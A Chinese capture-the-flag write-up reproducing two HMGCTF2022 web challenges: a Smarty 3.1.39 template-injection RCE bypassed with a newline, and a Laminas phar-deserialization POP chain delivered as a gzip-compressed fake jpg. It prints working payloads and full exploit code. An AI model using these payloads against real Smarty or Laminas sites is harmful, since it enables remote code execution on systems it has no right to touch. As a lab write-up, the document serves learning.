BUU hmgctf(复现)
没发现有这个比赛,看看buu复现一波
[HMGCTF2022]Smarty Calculator
www.zip直接下载源码。
if(isset($_POST['data'])){ if(isset($_COOKIE['login'])) { $data = waf($_POST['data']); echo "<div style='width:100%;text-align:center'><h5>Only smarty people can use calculators:<h5><br>"; $smarty->display("string:" . $data); }else{ echo "<script>alert(\"你还没有登录\")</script>"; } }
可以发现一个简单过滤的smarty注入,设置一下cookie。但是似乎情况不太对。用{if}注不了。然后输出一波smarty版本:
data={$smarty.version}
显示为3.1.39。然后谷歌了一下,似乎没有现成的exp。但是可以看到github更新日志:
修复了一个rce漏洞。谷歌可以搜到利用exp:
{function+name='rce(){};system("id");function+'}{/function}
很明显,这个用不了。本地搭建一下debug看看发生了什么。报了一个错误:
全局搜索一下在哪里报的:
if (preg_match('/[a-zA-Z0-9_\x80-\xff](.*)+$/', $_name)) { $compiler->trigger_template_error("Function name contains invalid characters: {$_name}", null, true); }
有个正则,检测name的值。估计绕过这个正则说不定就能rce。
一个回车就能绕过。尝试一下:
data={function+name='rce(){};system("id");%0afunction+'}{/function}
成功rce。绕过flag,直接通配符就行:
data={function+name='rce(){};system("cat+/*");%0afunction+'}{/function}
[HMGCTF2022]Fan Website
不管太多,直接先下载源码:www.zip。一个奇怪的框架(没见过),找了半天才找到控制器。在module/Album/src/Controller/AlbumController.php下可以看到album控制器。直接/album就能看到。然后分析action函数的触发方式,类似thinkphp的方式触发。关键函数:
public function imguploadAction() { $form = new UploadForm('upload-form'); $request = $this->getRequest(); if ($request->isPost()) { // Make certain to merge the $_FILES info! $post = array_merge_recursive( $request->getPost()->toArray(), $request->getFiles()->toArray() ); $form->setData($post); if ($form->isValid()) { $data = $form->getData(); $base = substr($data["image-file"]["name"],-4,4); if(in_array($base,$this->white_list)){ //白名单限制 $cont = file_get_contents($data["image-file"]["tmp_name"]); if (preg_match("/<\?|php|HALT\_COMPILER/i", $cont )) { die("Not This"); } if($data["image-file"]["size"]<3000){ die("The picture size must be more than 3kb"); } $img_path = realpath(getcwd()).'/public/img/'.md5($data["image-file"]["name"]).$base; echo $img_path; $form->saveImg($data["image-file"]["tmp_name"],$img_path); }else{ echo 'Only Img Can Be Uploaded!'; } // Form is valid, save the form! //return $this->redirect()->toRoute('upload-form/success'); } } return ['form' => $form]; }
文件上传,后缀限制,大小需要3kb以上,而且文件名不可控。
public function imgdeleteAction() { $request = $this->getRequest(); if(isset($request->getPost()['imgpath'])){ $imgpath = $request->getPost()['imgpath']; $base = substr($imgpath,-4,4); if(in_array($base,$this->white_list)){ //白名单 @unlink($imgpath); }else{ echo 'Only Img File Can Be Deleted!'; } } }
删除文件操作,看到路径怀疑可以phar,然后有个unlink。这个unlink可以触发phar。
所以直接搞一手phar。找链子。
全局搜索
__destruct,在Logger.php
public function __destruct() { foreach ($this->writers as $writer) { try { $writer->shutdown(); } catch (\Exception $e) { } } }
明显全局搜索shutdown看看有没有利用点。在Mail.php
public function shutdown() { // If there are events to mail, use them as message body. Otherwise, // there is no mail to be sent. if (empty($this->eventsToMail)) { return; } if ($this->subjectPrependText !== null) { // Tack on the summary of entries per-priority to the subject // line and set it on the Laminas\Mail object. $numEntries = $this->getFormattedNumEntriesPerPriority(); $this->mail->setSubject("{$this->subjectPrependText} ({$numEntries})"); } // Always provide events to mail as plaintext. $this->mail->setBody(implode(PHP_EOL, $this->eventsToMail)); // Finally, send the mail. If an exception occurs, convert it into a // warning-level message so we can avoid an exception thrown without a // stack frame. try { $this->transport->send($this->mail); } catch (TransportException\ExceptionInterface $e) { trigger_error( "unable to send log entries via email; " . "message = {$e->getMessage()}; " . "code = {$e->getCode()}; " . "exception class = " . get_class($e), E_USER_WARNING ); } }
$this->mail->setBody(implode(PHP_EOL, $this->eventsToMail));可以触发__call,而且参数可控。全局搜索__call,在PhpRenderer.php:
public function __call($method, $argv) { $plugin = $this->plugin($method); if (is_callable($plugin)) { return call_user_func_array($plugin, $argv); } return $plugin; }
然后看看这个plugin是否可控。
public function plugin($name, array $options = null) { return $this->getHelperPluginManager()->get($name, $options); }
看getHelperPluginManager()
public function getHelperPluginManager() { if (null === $this->__helpers) { $this->setHelperPluginManager(new HelperPluginManager(new ServiceManager())); } return $this->__helpers; }
这个__helpers可控,所以全局搜一波get函数。在BaseInputFilter.php:
public function get($name) { if (! array_key_exists($name, $this->inputs)) { throw new Exception\InvalidArgumentException(sprintf( '%s: no input found matching "%s"', __METHOD__, $name )); } return $this->inputs[$name]; }
所以最终导致plugin可控。然后直接触发call_user_func_array($plugin, $argv);
最终pop:Logger->Mail->PhpRenderer(其中里面的plugin需要BaseInputFilter进行控制)
但是还需要绕过
if (preg_match("/<\?|php|HALT\_COMPILER/i", $cont )) { die("Not This"); }
然后根据wp,直接用gzip压缩即可绕过。最终exp:
<?php namespace Laminas\Log{ use Laminas\Log\Writer\Mail; class Logger{ protected $writers; public function __construct() { $this->writers = array(new Mail()); } } } namespace Laminas\Log\Writer{ use Laminas\View\Renderer\PhpRenderer; class Mail{ protected $eventsToMail = []; protected $mail; public function __construct() { $this->eventsToMail = array("cat /flag"); $this->mail = new PhpRenderer();; } } } namespace Laminas\View\Renderer{ use Laminas\InputFilter\BaseInputFilter; class PhpRenderer{ private $__helpers; public function __construct() { $this->__helpers = new BaseInputFilter(); } } } namespace Laminas\InputFilter{ class BaseInputFilter{ protected $inputs = []; public function __construct() { $this->inputs = array("setBody" => "system"); } } } namespace{ use Laminas\Log\Logger; $phar = new Phar("phar.phar"); //后缀名必须为phar $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub $o = new Logger(); $phar->setMetadata($o); //将自定义的meta-data存入manifest $phar->addFromString("test.txt", file_get_contents("test.txt")); //添加要压缩的文件 //签名自动计算 $phar->stopBuffering(); system("gzip phar.phar"); rename("phar.phar.gz", "phar.jpg"); }
其中test.txt是一个3mb的文件,用linux直接生成:
truncate -s 3M test.txt
